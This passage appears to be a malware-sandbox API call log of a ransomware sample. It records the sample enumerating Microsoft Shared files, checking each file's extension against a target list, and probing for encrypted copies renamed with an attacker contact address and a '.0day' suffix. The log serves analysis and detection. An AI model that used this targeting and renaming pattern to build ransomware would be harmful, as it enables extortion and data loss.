[0036.516] lstrlenW (lpString=".bz2") returned 4 [0036.516] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0036.516] lstrlenW (lpString=".7z") returned 3 [0036.516] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0036.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.516] lstrlenW (lpString=".dbf") returned 4 [0036.516] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0036.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.516] lstrlenW (lpString=".1cd") returned 4 [0036.516] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0036.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.516] lstrlenW (lpString=".jpg") returned 4 [0036.516] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0036.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.516] lstrlenW (lpString=".doc") returned 4 [0036.516] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0036.516] lstrlenW (lpString=".docx") returned 5 [0036.516] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0036.516] lstrlenW (lpString=".pdf") returned 4 [0036.516] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0036.516] lstrlenW (lpString=".xls") returned 4 [0036.516] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0036.516] lstrlenW (lpString=".xlsx") returned 5 [0036.516] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0036.516] lstrlenW (lpString=".ppt") returned 4 [0036.516] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0036.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.517] lstrlenW (lpString=".zip") returned 4 [0036.517] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0036.517] lstrlenW (lpString=".rar") returned 4 [0036.517] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0036.517] lstrlenW (lpString=".bz2") returned 4 [0036.517] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0036.517] lstrlenW (lpString=".7z") returned 3 [0036.517] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0036.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.517] lstrlenW (lpString=".dbf") returned 4 [0036.517] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0036.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.517] lstrlenW (lpString=".1cd") returned 4 [0036.517] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0036.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.517] lstrlenW (lpString=".jpg") returned 4 [0036.517] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0036.517] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0036.517] lstrlenW (lpString="Alphabet.xml") returned 12 [0036.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.518] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=791686) returned 1 [0036.518] CloseHandle (hObject=0x1c0) returned 1 [0036.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0036.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.518] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.519] lstrlenW (lpString=".doc") returned 4 [0036.519] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString=".docx") returned 5 [0036.519] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.519] lstrlenW (lpString=".pdf") returned 4 [0036.519] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString=".xls") returned 4 [0036.519] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString=".xlsx") returned 5 [0036.519] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.519] lstrlenW (lpString=".ppt") returned 4 [0036.519] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.519] lstrlenW (lpString=".zip") returned 4 [0036.519] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.519] lstrlenW (lpString=".rar") returned 4 [0036.519] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString=".bz2") returned 4 [0036.519] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString=".7z") returned 3 [0036.519] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.519] lstrlenW (lpString=".dbf") returned 4 [0036.519] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.519] lstrlenW (lpString=".1cd") returned 4 [0036.519] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.519] lstrlenW (lpString=".jpg") returned 4 [0036.519] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.520] lstrlenW (lpString=".doc") returned 4 [0036.520] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString=".docx") returned 5 [0036.520] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.520] lstrlenW (lpString=".pdf") returned 4 [0036.520] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString=".xls") returned 4 [0036.520] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString=".xlsx") returned 5 [0036.520] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.520] lstrlenW (lpString=".ppt") returned 4 [0036.520] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.520] lstrlenW (lpString=".zip") returned 4 [0036.520] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.520] lstrlenW (lpString=".rar") returned 4 [0036.520] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString=".bz2") returned 4 [0036.520] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString=".7z") returned 3 [0036.520] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.520] lstrlenW (lpString=".dbf") returned 4 [0036.520] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.520] lstrlenW (lpString=".1cd") returned 4 [0036.520] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0036.520] lstrlenW (lpString=".jpg") returned 4 [0036.520] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.520] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0036.521] lstrlenW (lpString="Content.xml") returned 11 [0036.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.521] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=27045) returned 1 [0036.521] CloseHandle (hObject=0x1c0) returned 1 [0036.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0036.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.521] lstrlenW (lpString=".doc") returned 4 [0036.521] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.521] lstrlenW (lpString=".docx") returned 5 [0036.521] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.521] lstrlenW (lpString=".pdf") returned 4 [0036.521] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.521] lstrlenW (lpString=".xls") returned 4 [0036.521] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.521] lstrlenW (lpString=".xlsx") returned 5 [0036.522] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.522] lstrlenW (lpString=".ppt") returned 4 [0036.522] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.522] lstrlenW (lpString=".zip") returned 4 [0036.522] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.522] lstrlenW (lpString=".rar") returned 4 [0036.522] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString=".bz2") returned 4 [0036.522] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString=".7z") returned 3 [0036.522] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.522] lstrlenW (lpString=".dbf") returned 4 [0036.522] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.522] lstrlenW (lpString=".1cd") returned 4 [0036.522] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.522] lstrlenW (lpString=".jpg") returned 4 [0036.522] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.522] lstrlenW (lpString=".doc") returned 4 [0036.522] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString=".docx") returned 5 [0036.522] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.522] lstrlenW (lpString=".pdf") returned 4 [0036.522] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString=".xls") returned 4 [0036.522] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.522] lstrlenW (lpString=".xlsx") returned 5 [0036.522] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.522] lstrlenW (lpString=".ppt") returned 4 [0036.523] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.523] lstrlenW (lpString=".zip") returned 4 [0036.523] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.523] lstrlenW (lpString=".rar") returned 4 [0036.523] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.523] lstrlenW (lpString=".bz2") returned 4 [0036.523] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.523] lstrlenW (lpString=".7z") returned 3 [0036.523] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.523] lstrlenW (lpString=".dbf") returned 4 [0036.523] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.523] lstrlenW (lpString=".1cd") returned 4 [0036.523] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0036.523] lstrlenW (lpString=".jpg") returned 4 [0036.523] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.523] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0036.523] lstrlenW (lpString="boxed-correct.avi") returned 17 [0036.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.525] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=89600) returned 1 [0036.525] CloseHandle (hObject=0x1c0) returned 1 [0036.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0036.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.525] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.525] lstrlenW (lpString=".doc") returned 4 [0036.525] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.525] lstrlenW (lpString=".docx") returned 5 [0036.525] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.525] lstrlenW (lpString=".pdf") returned 4 [0036.525] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.525] lstrlenW (lpString=".xls") returned 4 [0036.525] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.525] lstrlenW (lpString=".xlsx") returned 5 [0036.525] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.525] lstrlenW (lpString=".ppt") returned 4 [0036.525] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.525] lstrlenW (lpString=".zip") returned 4 [0036.525] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.525] lstrlenW (lpString=".rar") returned 4 [0036.525] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.525] lstrlenW (lpString=".bz2") returned 4 [0036.525] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString=".7z") returned 3 [0036.526] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.526] lstrlenW (lpString=".dbf") returned 4 [0036.526] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.526] lstrlenW (lpString=".1cd") returned 4 [0036.526] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.526] lstrlenW (lpString=".jpg") returned 4 [0036.526] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.526] lstrlenW (lpString=".doc") returned 4 [0036.526] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString=".docx") returned 5 [0036.526] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.526] lstrlenW (lpString=".pdf") returned 4 [0036.526] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString=".xls") returned 4 [0036.526] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString=".xlsx") returned 5 [0036.526] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.526] lstrlenW (lpString=".ppt") returned 4 [0036.526] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.526] lstrlenW (lpString=".zip") returned 4 [0036.526] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString=".rar") returned 4 [0036.526] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString=".bz2") returned 4 [0036.526] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.526] lstrlenW (lpString=".7z") returned 3 [0036.526] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.527] lstrlenW (lpString=".dbf") returned 4 [0036.527] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.527] lstrlenW (lpString=".1cd") returned 4 [0036.527] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.527] lstrlenW (lpString=".jpg") returned 4 [0036.527] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.527] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0036.527] lstrlenW (lpString="boxed-delete.avi") returned 16 [0036.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.528] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=31744) returned 1 [0036.528] CloseHandle (hObject=0x1c0) returned 1 [0036.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0036.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.528] lstrlenW (lpString=".doc") returned 4 [0036.528] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.528] lstrlenW (lpString=".docx") returned 5 [0036.528] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0036.528] lstrlenW (lpString=".pdf") returned 4 [0036.528] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.528] lstrlenW (lpString=".xls") returned 4 [0036.528] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.528] lstrlenW (lpString=".xlsx") returned 5 [0036.528] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0036.528] lstrlenW (lpString=".ppt") returned 4 [0036.528] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.528] lstrlenW (lpString=".zip") returned 4 [0036.528] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.528] lstrlenW (lpString=".rar") returned 4 [0036.528] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".bz2") returned 4 [0036.529] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".7z") returned 3 [0036.529] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.529] lstrlenW (lpString=".dbf") returned 4 [0036.529] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.529] lstrlenW (lpString=".1cd") returned 4 [0036.529] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.529] lstrlenW (lpString=".jpg") returned 4 [0036.529] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.529] lstrlenW (lpString=".doc") returned 4 [0036.529] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".docx") returned 5 [0036.529] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0036.529] lstrlenW (lpString=".pdf") returned 4 [0036.529] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".xls") returned 4 [0036.529] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".xlsx") returned 5 [0036.529] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0036.529] lstrlenW (lpString=".ppt") returned 4 [0036.529] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.529] lstrlenW (lpString=".zip") returned 4 [0036.529] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".rar") returned 4 [0036.529] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".bz2") returned 4 [0036.529] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.529] lstrlenW (lpString=".7z") returned 3 [0036.530] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.530] lstrlenW (lpString=".dbf") returned 4 [0036.530] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.530] lstrlenW (lpString=".1cd") returned 4 [0036.530] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.530] lstrlenW (lpString=".jpg") returned 4 [0036.530] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.530] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0036.530] lstrlenW (lpString="boxed-join.avi") returned 14 [0036.530] CreateFileW 